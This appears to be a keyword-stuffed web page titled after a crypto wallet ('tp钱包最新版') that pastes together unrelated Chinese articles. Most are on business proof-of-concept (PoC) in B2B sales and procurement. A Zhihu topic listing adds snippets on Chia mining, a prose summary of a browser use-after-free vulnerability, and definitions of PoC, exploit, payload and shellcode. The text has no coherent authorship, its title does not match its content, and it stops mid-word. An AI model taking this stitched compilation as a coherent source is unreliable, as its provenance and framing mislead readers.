tp钱包最新版|poc

作者: tp钱包最新版
2024-03-07 20:36:44

什么是 PoC?如何做好概念验证? - 知乎

什么是 PoC?如何做好概念验证? - 知乎首发于客户成功 行业干货切换模式写文章登录/注册什么是 PoC?如何做好概念验证?获客多 Hokdo​已认证账号在今天,客户们往往都十分理智,在确认了产品的实际价值后才会进行购买。因此,作为销售流程中的一环,概念验证(PoC),就愈发被企业所重视。那么到底什么是 PoC?企业应当怎么做好 PoC?这篇文章,我们就来帮助各位了解一下。什么是 PoC?PoC 的定义是什么?概念验证(PoC,Proof of Concept),指用简单的方式证明某想法、概念、或理论的可行性。在具体的销售场景里,PoC 指企业在实际场景中给客户进行产品演示或试用,来验证产品对于客户的实际价值。为什么要进行 PoC 呢?在销售介绍完公司的产品后,很多客户都会产生这样的疑虑:「产品听起来不错,功能十分强大,但在实际场景中真的能发挥出如此大的价值吗?」事实胜于雄辩,想要消除客户心中的顾虑,企业便会为客户提供实际业务场景下的验证流程。对双方来说,PoC 的意义分别在于:▪避免客户买到华而不实的产品或服务;▪避免企业在不匹配的客户身上浪费过多的时间。以一家物流机器人公司为例,某工厂想要采购该公司的五十台机器人。在没有进行 PoC 的情况下,五十台设备就被交付给了工厂。然而,在实际的生产过程中,工厂发现该公司的机器人不能在狭窄区域很好地进行搬运作业,仍然需要人力进行辅助,于是提出了退货。因为缺少了 PoC 的环节,该交易中的双方都浪费了不少的时间和精力,可谓是双输。怎么做好 PoC?企业如何在销售过程中做好 PoC 呢?基于过往的经验,我们有如下几点建议。不盲目开始 PoCPoC 是销售的胜利冲锋号角,不应该毫无准备就吹响。在开始 PoC 之前,企业应通过和客户的多次交流,清楚地了解客户基础情况和需求。PoC 非常耗费企业的人力和资源,需要企业不同团队的成员,进行长时间线上线下的工作,有些项目甚至需要一定程度的定制化开发。为了避免企业白忙活,在销售团队决定对客户开始 PoC 之前,应当了解清楚以下几个问题的答案:▪企业是否已经完全了解了客户的需求?▪企业的产品是否能够解决客户的问题?▪对方是否了解了产品能够提供的价值?▪对方是否愿意为产品解决的价值点付费?▪对方是否有充足的预算?▪PoC 对象是否有决策权?▪企业在这个项目上是否存在竞争者?▪综合以上几点,这笔生意成交的几率有多大?▪这笔生意能为企业带来多大的价值?时刻围绕客户需求,验证产品的核心价值客户愿意为某款产品付费,永远不是为了购买产品功能本身,而是为了产品能为其解决的问题、以及带来的实际价值。因此,在 PoC 的过程中,销售应分清「核心需求点」和「附加功能点」,着重向客户展示产品解决其关键需求的过程,而不是大而全地验证那些客户并不需要的功能。如果销售始终沉浸在产品本身,而不能从客户的角度出发,客户将很难真正意识到产品的核心价值,那么 PoC 必定是失败的。为 PoC 设定具体的参与者、步骤、和目标对于一家企业的不同客户来说,PoC 的具体内容不大一样,但规则和流程都是相似的。企业应当在 PoC 之前,确认好以下几点:▪谁来参与?一般来说,PoC 流程是由销售来主导的,但也需要其他团队的支持。例如,产品研发团队会为 PoC 提供产品演示和一定的新功能开发,交付团队会为客户提供小场景的交付,客户成功等团队会提供特定场景下的解决方案,而客服和维修工程师团队则会解决客户的具体问题;▪步骤有哪些?通常企业会根据自身的业务、产品模式,设计出一套标准的 PoC 步骤,其中可能包括:工作启动会、产品宣讲、技术测评、实际场景试用、问题反馈、商务验证等。标准的流程有助于企业系统性、规模化地开展 PoC 工作;▪PoC 的目标?企业与客户双方应当在 PoC 流程开始前,商议好标志着 PoC 完成的一些结果指标。企业最好能够拿到对方的购买意向承诺,即若在 PoC 中成功验证了产品的价值,客户就应当进行购买。如果没有完成既定目标,企业则应当视情况,优化解决方案或放弃项目。通过 PoC 加速企业业务增长想要管理好团队的 PoC 流程,提升客户的体验和购买意愿,你需要:▪项目流程管理工具。管理好 PoC 的流程,使团队系统性地、有条不紊地完成 PoC 的相关工作;▪销售管理工具。管理好不同客户的销售流程,准确识别开始 PoC 的时机,推动销售增长;▪产品演示工具。帮助企业更好地进行,让客户更加直观地理解产品价值;▪各项客户服务和成功工具。从方方面面帮助客户最大化地实现价值,使客户切身感受到产品的价值,并愿意为其付费。上述的功能点,Hokdo 通过一套系统帮你轻松实现。作为专业的客户成功平台,获客多 Hokdo 提供了一套易于集成、灵活拓展的客户成功解决方案。使用 Hokdo 的 PoC 管理工具、客户成功计划、健康度分析、客户反馈管理等强大功能,你将科学管理 PoC 流程和客户体验,实现前所未有的收入增长。想要了解更多关于客户成功、客户服务、或是销售的最佳实践、如何管理商业化团队、相关的实操技巧等等,欢迎关注或联系我们,Hokdo 帮你构建加速业务增长的客户成功引擎。微信公众号搜索「获客多 Hokdo」,关注我们,了解更多客户服务或客户成功行业干货~访问 www.hokdo.com,联系我们,免费咨询试用发布于 2022-08-10 21:20POC (Proof Of Concept)获客多 Hokdo​赞同 92​​添加评论​分享​喜欢​收藏​申请转载​文章被以下专栏收录客户成功 行业干货有关客户成功的行业干

什么是POC?验证性测试用途是什么? - 知乎

什么是POC?验证性测试用途是什么? - 知乎切换模式写文章登录/注册什么是POC?验证性测试用途是什么?DIA数皆智能​已认证账号POC是指业界流行的针对客户具体应用的验证性测试名词:验证性测试英文全称:POC(Proof of Concept)中文名称:验证性测试名词解释:验证性测试(Proof of Concept,简称POC)是业界流行的针对客户具体应用的测试方法。它的主要目的是验证客户提出的性能要求和扩展需求是否能够得到满足。在POC过程中,测试人员会根据用户的需求,在选定的服务器上进行真实数据的运行,通过实际测算来评估系统的承载能力和性能变化。在进行POC测试时,测试人员需要关注多个方面,以确保测试结果的准确性和可靠性。首先,测试人员需要选择适合的测试环境,包括硬件和软件配置,以确保测试条件的可控性和一致性。其次,测试人员需要根据用户提出的需求,设计合理的测试用例和场景,以全面覆盖系统的各种功能和性能要求。在POC测试过程中,测试人员需要对系统进行多方面的测试,包括负载测试、压力测试、稳定性测试等。这些测试可以帮助测试人员了解系统在不同负载下的性能表现,以及系统在面临高并发请求时的处理能力。通过这些测试,测试人员可以发现系统潜在的性能瓶颈和问题,并及时进行修复和优化。除了性能测试外,POC测试还需要关注系统的可扩展性和可维护性。随着用户业务的不断扩展,系统需要具备足够的可扩展性,以满足未来业务增长的需求。同时,系统的可维护性也是非常重要的,以确保系统的长期稳定运行和后续的升级和维护工作的顺利进行。执行验证性测试(Proof of Concept,POC)的流程通常包括以下几个步骤:1. 明确测试目标和需求:在开始POC测试之前,需要明确测试的目标和需求。这包括了解客户的需求、系统的性能要求、扩展需求等,以便为测试提供明确的方向。2. 选择测试环境和工具:根据测试目标和需求,选择适合的测试环境和工具。测试环境应尽可能接近实际生产环境,以确保测试结果的准确性。同时,选择适合的测试工具可以提高测试效率和准确性。3. 设计测试用例和场景:根据测试目标和需求,设计合理的测试用例和场景。测试用例应覆盖系统的各种功能和性能要求,场景应模拟实际业务情况,以便全面评估系统的性能表现。4. 执行测试并记录结果:按照测试用例和场景执行测试,并记录测试结果。在测试过程中,需要关注系统的性能指标、响应时间、吞吐量等,以便及时发现问题并进行修复。5. 分析测试结果并给出结论:根据测试结果,分析系统的性能表现、瓶颈和问题,并给出相应的结论和建议。如果测试结果达到预期目标,则可以进一步推广系统;否则,需要进行相应的优化和改进。通过POC测试,客户可以更加了解系统的性能表现和未来业务扩展的可行性。测试人员也可以根据测试结果对系统进行优化和改进,提高系统的性能和稳定性,为客户的业务发展提供更好的支持和服务。发布于 2024-02-05 18:02・IP 属地上海POC (Proof Of Concept)系统测试​赞同 1​​添加评论​分享​喜欢​收藏​申请

项目POC的作用是什么? - 知乎

项目POC的作用是什么? - 知乎首页知乎知学堂发现等你来答​切换模式登录/注册互联网产品经理软件外包项目POC的作用是什么?菜鸟产品一枚,经过一年的工作,参与的大多是项目的POC阶段,听带我的老员工说,老大打算日后让我参与更多项目的POC阶段,想问问,这对我来说是好事吗?P…显示全部 ​关注者170被浏览983,731关注问题​写回答​邀请回答​好问题 12​1 条评论​分享​10 个回答默认排序JiaX风控数据分析师,Python爱好者一枚​ 关注站内有回答啊:https://zhuanlan.zhihu.com/p/39820024PoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。验证内容1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能;2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求;3、产品的API适用性;4、产品相关技术文档的规范性、完整性;5、涉及到自定义功能研发的,还需验证API开放性,供应商实施能力;6、企业资质规模及企业实施案例等。验证内容归根结底,就是证明企业选择的产品或供应商能够满足需求,并且提供的信息准确可靠。PoC测试工作准备前提1、前期调研充分,并已经对产品或供应商有了较深入的沟通了解;2、企业对自己的产品需求比较清晰。PoC测试工作参与者使用用户代表、业务负责人、项目负责人、技术架构师、测试工程师、商务经理等PoC测试工作准备文档1、PoC测试工作说明文档。内容包括测试内容、测试要求(如私有化部署)、测试标准、时间安排等;1、功能测试用例。主要确认功能可靠性,准确性。内容包括功能名称、功能描述等;2、场景测试用例。主要测试企业团队实施响应速度、实施能力、集成能力。这部分通常按照企业需求而定,不建议太复杂,毕竟需要供应商实施干活儿的嘛,拖得太长企业耐性受到影响,时间也会拉长。3、技术测评方案。主要验证产品的性能、功能覆盖情况 、集成效率、技术文档的质量。4、商务测评方案。主要包括企业实力、企业技术人才能力、版权验证、市场背景、产品报价等。PoC测试工作第一阶段 工作启动由商务或者对外代表对供应商发布正式邀请并附PoC测试工作说明。建立PoC协同群。以满足快速沟通,应答。涉及到私有化部署的,需要收集供应商部署环境要求,并与供应商一起进行部署工作,同时企业参与人员对部署工作情况做好记录。第二阶段 产品宣讲及现场集中测试供应商根据企业提供的PoC测试工作说明及相应测试模块的用例或方案进行产品现场测试论证。企业参与人员参与功能测试,并填写记录和意见。此阶段供应商往往需进行现场操作指导:。第三阶段 技术测评供应商根据企业提供的技术要求给出相关支持文档,企业进行现场比对,根据实际情况进行统计记录。并保留供应商提供的资料和对比记录。涉及到场景demo设计的,建议企业对实施人员能力、实施时长、实施准确性进行比对。第四阶段 间歇性测试工作该阶段是在第一阶段启动时,就可以开始了。测试功能外,还包括关键用户使用的体验心得、易用性评价。该部分允许企业用户主观评价,建议可以扩大范围组织间歇性测试,并做好测试用户记录。间歇时间1天或者多天根据实际情况安排。第五阶段 商务验证供应商根据企业提供的商务测评方案,积极配合工作。涉及到客户核实的,还需要企业进行考证。该部分工作也是从第一阶段启动时,就可以开始了。第六阶段 背书归档、分析总结每个阶段的工作都需要记录好参与人、时间、工作说明,并将测试过程中企业的、供应商的文档分类归档。对每个阶段进行分析对比,总结评价。进行整体工作分析总结。PoC工作按照不同企业,和程度,测试的方式和投入力度不一样。但是目的都是相同的——验证产品或供应商能力真实满足企业需求。对PoC的总结可能比较片面,甚至可能与大家理解有偏差,欢迎共同交流,一起成长。发布于 2020-05-11 21:41​赞同 167​​添加评论​分享​收藏​喜欢收起​dbaplus社群​已认证账号​ 关注随着分布式系统和微服务的日益发展,系统的开发和运维对于可观测性的需求越来越迫切,为了解决监控排障、链路梳理、性能分析等业务问题,将海量 Metrics/Trace/Log 数据进行整合与统一,构建站式全链路观测诊断平台成为了企业首选。9月28日晚8点,平安健康中间件架构师-张硕将阐述平安健康建设千亿级储能、毫秒级查询耗时的全链路追踪系统全过程,对于Pinpoint、Zipkin、Jaeger和SkyWalking进行选型分析,剖析评估SkyWalking的优势及适配场景,并讲解SkyWalking接入的POC阶段,包括对接发布系统及配置中心、完善插件补全链路及自监控系统、测试环境观测,以及接入核心应用时如何对启动耗时、kafka积压、存储查询等生产问题进行优化。活动信息主题:平安健康千亿级全链路追踪系统的建设与实践讲师:张硕 平安健康 中间件架构师时间:9月28日周三晚8点地点:线上直播间讲师信息直播地址>>>>更多直播干货关注【dbaplus社群】公众号,后台回复【220316】获取4期精选直播回看和PPT。云原生时代下,对运维模式提出了哪些新要求?7×24小时待命救火和背锅困局如何突破?结构复杂、技术变化、故障根因、人员管理、业务矛盾等问题如何逐一攻克?关于我们dbaplus社群是围绕Database、BigData、AIOps的企业级专业社群。资深大咖、技术干货,每天精品原创文章推送,每周线上技术分享,每月线下技术沙龙,每季度Gdevops&DAMS行业大会。发布于 2022-09-27 10:35​赞同​​添加评论​分享​收藏​喜欢

B端产品经理(三):如何做好项目POC | 人人都是产品经理

B端产品经理(三):如何做好项目POC | 人人都是产品经理

首页

培训课程

名师辅导课

产品经理入门实战班

90天B端产品实战班

AI重塑职场竞争力实战行动营

查看更多

个人自学课

互联网运营能力进阶

业务产品经理能力进阶

电商产品经理从入门到进阶

查看更多

企业内训课

数字化产品经理课

商业化产品实战课

数字化营销体系课

B端运营实战课

私域流量实战课

数据分析体系课

查看更多

分类浏览

业界动态

27977篇文章

产品设计

18064篇文章

产品运营

14472篇文章

产品经理

9484篇文章

职场攻略

4956篇文章

营销推广

4485篇文章

交互体验

3730篇文章

分析评测

3249篇文章

创业学院

2119篇文章

用户研究

1754篇文章

数据分析

1718篇文章

原型设计

1420篇文章

活动讲座

问答

企业培训

摸鱼

快讯

搜索

APP

起点课堂会员权益

职业体系课特权

线下行业大会特权

个人IP打造特权

30+门专项技能课

1300+专题课程

12场职场软技能直播

12场求职辅导直播

12场专业技能直播

会员专属社群

荣耀标识

{{ userInfo.member ? '查看权益' : '开通会员' }}

发布

注册 | 登录

登录人人都是产品经理即可获得以下权益

关注优质作者

收藏优质内容

查阅浏览足迹

免费发布作品

参与提问答疑

交流互动学习

立即登录

首次使用?

点我注册

B端产品经理(三):如何做好项目POC

森焱

2023-04-11

0 评论

12350 浏览

32 收藏

15 分钟

释放双眼,带上耳机,听听看~!

00:00

00:00

在客户对产品方案心动并感到满意之后,下一步要做的,便是推进项目落地,那么作为B端产品经理,你要如何做好这一步?也许,你可以借助POC,即“概念验证”来实现,让客户感受到产品可能的功能与实际效果。本文便讲述了如何做好项目POC的注意事项,一起来看。

一、前言

前文给大家讲述了如何用方案打动客户,那么在客户对我们的产品方案动心后,需要做些什么促进项目落地呢?按照“大B”产品的思路,我们往往会开始进入POC阶段,让客户切实感受产品的功能及效果,本文将给大家阐述有关B端产品POC的知识。

二、背景

部门遇到新的商机项目,经过几轮方案沟通后,客户对产品表现出极大兴趣,但是由于没有试用过,有些不信任,公司希望极力拿下这个项目,提高营收;

1)自身现状

产品能力:单一产品无法满足客户需求,最终方案由多个产品组合赋能。

2)客户现状

期望:对我们的方案有倾向性,但是不自信。

竞争:客户收到多个厂商的方案汇报,竞争对手较为活跃。

小结:当前的矛盾是如何增强客户信心,击败竞争对手。

三、何为POC

针对以上矛盾,此时最常用的合规手段就是产品POC,那么什么是产品POC呢,POC(Proof of Concept),即概念验证。通常是公司做产品选型或开展外部实施项目前,进行的一种产品或供应商能力验证工作。由准备参与投标工作的供应商进行产品部署,交由招标公司进行试用,并对产品能力进行打分,以此确保供应商具备良好的产品或项目交付能力。所以POC参与的两个对象是:

供应商:提供产品能力用于测试验证;

客户:负责产品测试及打分。

四、POC的内容

1. 产品硬实力

1)产品的功能:后期需要交付的产品功能,根据客户提供的需求,罗列功能清单;或者由客户提供所需要的功能清单均可。

产品的功能包括两个部分:

GU能力:即提供具备可视化界面能力的产品系统,方便非研发人员使用。

API能力:提供API或者SDK,便于客户(需要具备研发能力和研发环境)进行研发测试。

2)产品的性能

即对产品所要求的性能指标,通常由公司提供给客户做参考,也有客户会提出业务要求;一般在准备性能指标时,建议提供具体性能指标所应用的环境及硬件设备等测试环境要求,便于对指标约束。

2. 企业软实力

1)产品的相关文档:包括产品介绍文档、产品使用手册、产品白皮书、接口文档等,详细的文档方便客户查询,也会很好减轻对接工作。

2)企业资质材料:如安全认证、软著等材料,一般多用于正式投标阶段,POC如果准备,可以有备无患。

3)人员服务态度:在POC阶段是最容易忽视的一项事项,因为没有任何的明文要求,所以往往无意识,好的对客态度,往往能起到事半功倍的效果,可以给客户建设出两个心理状态。

重视项目:态度积极,客户会感觉自己被重视了,本次的项目我们是非常有诚意有信息的。

运维积极:对待问题不回避,响应及时,会让客户觉得我们及时后期项目交付后,也能积极响应运维问题,不会交付后,就开始甩手爱答不理。

小结:产品硬实力和企业软实力是相辅相成的,在跟友商的比拼中,如果产品硬实力过硬,那可以直接实施降维打击,获得头筹,如果双方产品硬实力相当,一定要凸显软实力态度,给客户良好的主观印象,也有利于后续的商务打分。

五、如何POC

理清了上面POC概念和目的后,就是要考虑如何POC,以及如何把POC做好,赢得客户的信任,争取最大机率将项目拿下,做好POC,我们可以从以下方向出发。

1. POC前

1)人员安排

由商务或者具体对接人进行协调安排,组建对接群,将双方的人员组织到同一个沟通群,方便快速沟通和应答;具体的人员角色可以安排参考如下表格,其中供应商侧最好是各个角色都有对应同事参与,以便解答客户各类问题(实际过程中各类问题会频繁问到)。

如果有条件,建议安排一位记录员将客户问题记录汇总,一方面可以收集客户问题用于产品迭代提升,一方面可以避免在正式中标后,产品部署时避免踩相同的坑。其中双方总负责人既要负责具体产品验证工作,还要对接商务问题,如果项目较大,可以灵活安排多位分负责任人,分别管理不同产品模块的POC。

2)POC启动

人员安排好后,下一步准备启动POC,具体可以从以下3个方面开始着手,如下:

① 准备POC测试方案

由供应商根据客户提供的需求清单,准备一份详细的POC测试方案,测试方案内容要包括“测试目的”、“测试人员及职责”、“测试时间”和“产品功能”,其中产品功能模块要包括产品验证的功能、操作流程、预期结果、打分规则等,后续案例详解将详细描述。该环节的人员职责如下:

核心人员包括:双方总负责人、供应商产品经理;负责输出整体方案,形式以word或excel为主。

其他参与人员:技术工程师和测试工程师,负责对POC方案评估,确保可行性。

② 部署POC测试环境

测试方案准备完后,根据需要测试的产品功能准备硬件环境和软件包,其中硬件通常由客户按照供应商要求准备,有些政企客户由于日常使用设备较为老旧,也可以是由供应商准备,测试环节准备要点如下:

硬件:确保硬件条件与日后实际交付的硬件条件尽量一致,尤其是AI类产品的GPU型号及参数一定是符合技术要求的,否则无法确保算法效果跟宣讲的一致。

软件:由产品经理从公司申请软件包,以License授权的形式打包,在POC测试期间可用,超过时间期间,授权将失效,无法使用,确保公司的软件资源不会因为复制或者其他因素流失。

③ 进行POC启动会

测试环境部署完后,就可以交付客户进行产品验证了,但是在这之前,建议准备一个启动会,一方面宣告POC可以正式启动了,同时宣讲测试细节;另一方面也是拉齐双方人员正式认识,同时对领导的交代,项目工作已进入新的阶段,该环节需要注意的要点如下:

角色明确:客户各个参与测试的人员明确。

材料归档:每天的测试结果需要统一汇总,并有固定的地方归档。

信息同步:除了日常群消息交流外,需要邮件作为正式沟通形式同步测试结果和重要需求。

2. POC进行

POC进入测试环节即转变为由客户进行主导,换句话说此时的测试是半可控状态,一方面客户会按照测试方案进行验证,此时基本是按照预设的形式在推进,另一方面有些客户测试人员会随意测试(大概率是破坏性的),尤其是AI类产品,无法预判客户自己准备的数据集是如何,可能引发很多预期外的问题,需要产品经理和技术工程师时刻准备着。

一般POC的测试验证可以包括集中测试和主观测试两个阶段,具体如下:

1)集中测试

客户根据测试方案对产品功能和模板进行集中化测试,在2-3天内将测试方案中的所有功能和性能验证完,并打分,供应商可以安排驻场人员根据客户测试需要进行现场指导,在指导过程中,可以适当引导客户,以利好于测试结果,便于最终项目成单,注意要点如下:

① 功能测试:客户按照测试流程确保实测结果与预期结果一致,如果不一致,按照计分规则打分,供应商需要监督客户确保测试流程符合要求,以证实扣分是有效的。

② 性能测试:性能测试较为困难,包括产品性能、算法性能、产品稳定性、安全性等,一般有3个方式推进:

如果是具备研发能力的客户,可以是由客户自发测试评估。

如果客户是不具备研发能力的,可以找第三方测试厂商对产品性能测试验证并出具测试报告。

如果客户不具备研发能力,还可以与供应商达成一致意见,由供应商出具测试报告,并附加测试公正性及可行性保证承诺。

2)主观测试

在集中测试后,客户可以扩大测试范围,包括测试人员,测试边界,测试时间,该环节主要由功能测试转向产品易用性、稳定性等测试,如果是AI类产品,还可以考虑扩大数据集,做更多边界测试,确保产品对实际业务环境的适应性。

3. POC结束

所有的测试完成后,即意味着POC阶段就要结束了,下一步就是需要对该阶段做一个收尾工作了,可以包括如下:

1)归档总结

将所有测试的信息进行材料归档,并输出总的测试验证报告,材料中需要包括5要素,“人、时间、测试模块、测试用例、测试结论及分值”,最后发送测试验证报告,其必须是由客户以正式沟通形式(邮件)形式发出,并抄送相关领导,作为供应商产品经理,在客户发出测试验证报告前,需要再次确认内容准确性

2)商务跟进

由于很多公司各司其职,作为供应商产品经理经常会忽略最后的“商务跟进”,虽然不一定要亲自跟进,但是一定要推动销售或者售前跟进POC之后的商务情况,比如客户还有什么新的需求,后续是否要分期、招投标时间,本次POC通过的供应商有几家等

六、案例说明

案例说明章节以供应商产品经理视角给出如何编写POC测试方案的产品功能模块的模板。

首先确定测试模块所占分值,然后评估每个功能所占的分值,不超过该模块的总分值。

给出产品功能的操作流程、预期结果,其中预期结果中给出每个功能点的分值,其中仅核心功能给到分值,其他常见基础功能不需要占分。

具体的模板样例可以如下:

七、结论

作为对外的toB产品经理不管角色是客户还是供应商,都会不可避免的遇到项目POC,所以了解项目POC,并做好项目POC非常重要,如果角色是供应商,做好项目POC,就有很大机会推动项目落地,如果角色是客户,做好项目POC,就可以严控供应商质量,不会后期因为采购到不靠谱的供应商,耽误业务进度,被公司发难。

专栏作家

Eric_d,人人都是产品经理专栏作家。关注AI、大数据等领域,擅长需求分析、产品流程和架构设计等,日常喜欢徒步。

本文原创发布于人人都是产品经理,未经许可,禁止转载。

题图来自 Unsplash,基于CC0协议。

该文观点仅代表作者本人,人人都是产品经理平台仅提供信息存储空间服务。

收藏已收藏{{ postmeta.bookmark }}

点赞已赞{{ postmeta.postlike }}

更多精彩内容,请关注人人都是产品经理微信公众号或下载App

2年POC初级

森焱

微信号17720216122

18篇作品

188078总阅读量

为你推荐

HMI设计 | 用户画像构建流程

07-067744 浏览

社区团购“黄金时代”,画下句点?

10-182070 浏览

从苦情戏直播到“免费”评书机,为什么骗子专盯老年人?

03-194597 浏览

抖音做外卖,对美团威胁有多大?

02-134873 浏览

同期Z世代社交死差不多了,Wizz为什么能月入200万美元

01-112705 浏览

评论

评论请登录

目前还没评论,等你发挥!

为你推荐

系统重构实战:多平台电商订单履约系统设计

10-175837 浏览

产品项目管理的智慧

09-213857 浏览

拆解问卷星——问卷调查领域份额超过80%的 SaaS 产品

04-175177 浏览

快讯

查看更多

热门文章

自媒体要转咨询吗?

03-04

【案例分享】数字化金融银行企微私域营销,赋能业务增长

03-06

周受资再谈TikTok:信任、AI和沙特计划

03-07

交互型数字人发展现状

03-05

一文搞懂Saas产品定价(附7种定价模式)

03-05

AI电商「军备赛」:一个新时代的电商产业序曲

03-07

文章导航

一、前言

二、背景

三、何为POC

四、POC的内容

五、如何POC

六、案例说明

七、结论

关于

人人都是产品经理(woshipm.com)是以产品经理、运营为核心的学习、交流、分享平台,集媒体、培训、社群为一体,全方位服务产品人和运营人,成立12年举办在线讲座1000+期,线下分享会500+场,产品经理大会、运营大会50+场,覆盖北上广深杭成都等20个城市,在行业有较高的影响力和知名度。平台聚集了众多BAT美团京东滴滴360小米网易等知名互联网公司产品总监和运营总监,他们在这里与你一起成长。

合作伙伴

链接

隐私政策

投稿须知

意见反馈

帮助中心

公众号

视频号

友情链接

PM265

产品经理导航

起点课堂

猪八戒网

人才热线

伙伴云表格

网易易盾

个推

友盟+

粮仓

创业邦

每日报告

鸟哥笔记

慕课网

旗下品牌: 起点课堂 | 运营派 | 粮仓企微管家

©2010-2024 - 人人都是产品经理 - 粤ICP备14037330号-粤公网安备 44030502001309号

广播电视节目制作经营许可证(粤)字第03109号 版权所有 © 深圳聚力创想信息科技有限公司

POC (Proof Of Concept) - 知乎

POC (Proof Of Concept) - 知乎首页知乎知学堂发现等你来答​切换模式登录/注册POC (Proof Of Concept)暂无话题描述关注话题​管理​分享​讨论精华视频等待回答什么是 PoC?如何做好概念验证?获客多 Hokdo​已认证账号[图片] 在今天,客户们往往都十分理智,在确认了产品的实际价值后才会进行购买。因此,作为销售流程中的一环,概念验证(PoC),就愈发被企业所重视。那么到底什么是 PoC?企业应当怎么做好 PoC?这篇文章,我们就来帮助各位了解一下。 [图片] [图片] 什么是 PoC?PoC 的定义是什么?概念验证(PoC,Proof of Concept),指用简单的方式证明某想法、概念、或理论的可行性。在具体的 销售场景里,PoC 指企业在实际场景中给客户进行产品演示或试用,来…阅读全文​​赞同 92​​添加评论​分享​收藏PoC相关概念hell02006security waterPoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。 验证内容 1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能; 2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求; 3、产品的API适用性; 4、产品相关技术文档的规…阅读全文​​赞同 25​​1 条评论​分享​收藏chia挖矿已经一些新人是否能入场分析大胡子石韭菜屌丝最近几天CHIA很火 很多人加我 我发现有一大部分人直接就什么都不懂 就问矿机怎么卖了 矿怎么挖啊 你这让我如何回答 最近很多什么社团 社区都冒出来了 一个字 割死你们 CHIA这个币P盘比较慢 还有很多人 这些所谓的社团 社区 盘都没有P出来 都收钱卖算力了 我实在是看不下去 就发表下自己看法 不想让很多小白 被忽悠 现在硬盘已经涨价断货了 这些社团 社区 有没有硬盘你都不知道 你们却把钱打给人家 难道真是猪?再说你们现在入手…阅读全文​​赞同 11​​11 条评论​分享​收藏关于概念证实 — POCYang Tony道在日常万事中一、 POC是英语Proof of Concept的缩写,Proof of Concept翻译过来就是概念证明, 是指对某些想法的一个较小而不完整的实现,目的是通过示范原理,来证明其可行性。在我从事的软件行业里,Concept 直译成概念这个词不太准确,我这里把它翻成观点,观点包括了管理要求的透明度,管理深度和便利性上的取舍程度。这样定义更符合软件行业的习惯。 在软件销售的过程中,我们经常会遇到客户要求做POC,来证实自己的软件系统可以满足客户…阅读全文​​赞同 7​​添加评论​分享​收藏CVE-2021-26411漏洞分析笔记看雪看雪,为IT专业人士、技术专家提供了一个民间交流与合作空间。本文为看雪论坛优秀文章 看雪论坛作者ID:AshCrimson 一、漏洞信息 CVE-2021-26411 该漏洞存在于iexplore.exe mshtml.dll模块,在JS9引擎处理dom对象时,由于未对nodevalue对象的有效性做判断,所导致的UAF漏洞,该漏洞可实现RCE。 二、漏洞分析 漏洞poc poc比较简单,首先创建了一个element。创建了2个Attribute属性。 声明了一个对象obj,将obj的valueof函数进行了重载,重载后的函数会清空element的所有属性。attr1赋值obj,a…阅读全文​​赞同 7​​2 条评论​分享​收藏最近忙着搞矿机玩玩 硬盘 CHia(post)大胡子石韭菜屌丝Chia于2017年8月成立,旨在开发改进的区块链和智能交易平台。我们正在建立Chia网络,以改善全球金融和支付系统。Chia将是一个企业级数字货币。Chia正在使用自比特币以来的第一个新的区块链共识算法。它被称为“时空证明”,它是由现役最好的网络协议工程师,BitTorrent的发明者Bram Cohen创建的。Chialisp是Chia的新型智能交易编程语言,功能强大,易于审核且安全。当前可用的参考智能交易包括:原子掉期,授权收款人,可恢复钱…阅读全文​​赞同 5​​18 条评论​分享​收藏CHia P盘教程大胡子石韭菜屌丝[图片] [图片] [图片] [图片] [图片] [图片] [图片] P盘开始后一旦中断需要删除相应的缓存文件重新P盘阅读全文​​赞同 4​​5 条评论​分享​收藏如何讲好POC的一些总结大羽飞鹤业财数字化转型(财务共享、全面预算、业务中台)首先POC是以客户提供的某个测试项目进行实施和演示,不是产品功能演示介绍,POC的核心是按照故事线将产品功能进行讲解,主要考虑以下几点: 第一,按照用户使用的故事线逐步讲解。 在给客户讲解时,由于信息量比较大,客户在接收信息时如果无法抓住重点,不利于客户对我们产品的认可。需要我们按照用户使用的故事线逐步讲解,让客户形成总览的概念。比如全面预算系统,可以站在最终用户使用的角度从战略的分解,计划的制定、预算…阅读全文​​赞同 4​​3 条评论​分享​收藏国外大牛之我如何使用 mxGraph 和 VueJS 构建高级 SDN PoC 设计器代码放牧人SwiftUI爱好者国外大牛之我如何使用 mxGraph 和 VueJS 构建高级 SDN PoC 设计器 什么是 mxGraph?简而言之,它是一个 JavaScript 开发人员库,旨在提供即插即用的组件来绘制、移动上下文图或具有属性的图形元素并与之交互。它是用纯 JavaScript 编写的,没有转译器或 NPM 依赖项。一个普通的 mxGraph 编辑器看起来像: [图片] 最左侧是模具(形状)库或您可以放置 、交互和连接的节点对象,中间是画布,最右侧是画布或选定节点对象的属性面板。在布…阅读全文​​赞同 4​​1 条评论​分享​收藏POC、EXP、Payload与Shellcode的区别Michael在网络安全和人工智能方面分享一些小知识1. POC、EXP、Payload与ShellcodePOC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。 2. 几点注意POC是用来证明漏洞存在的,EXP是用来利用漏洞的…阅读全文​​赞同 4​​1 条评论​分享​收藏Pocsuite3的安装和使用及poc代码的学习雷石安全实验室向安全工作者不定期分享渗透、APT、企业安全建设等干货。简 介: Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。你可以直接使用 Pocsuite 进行漏洞的验证与利用;你也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架; 同时,你还可以在你的漏洞测试工具里直接集成 Pocsuite,它也提供标准的调用类。 Pocsuite3是完全由Python3编写,支持Windows/Linux/Mac OSX等系统,在原Pocsuite的基础上进行了整体的重写与升级,使整个框架更具有操作性和…阅读全文​​赞同 3​​2 条评论​分享​收藏ghostscript 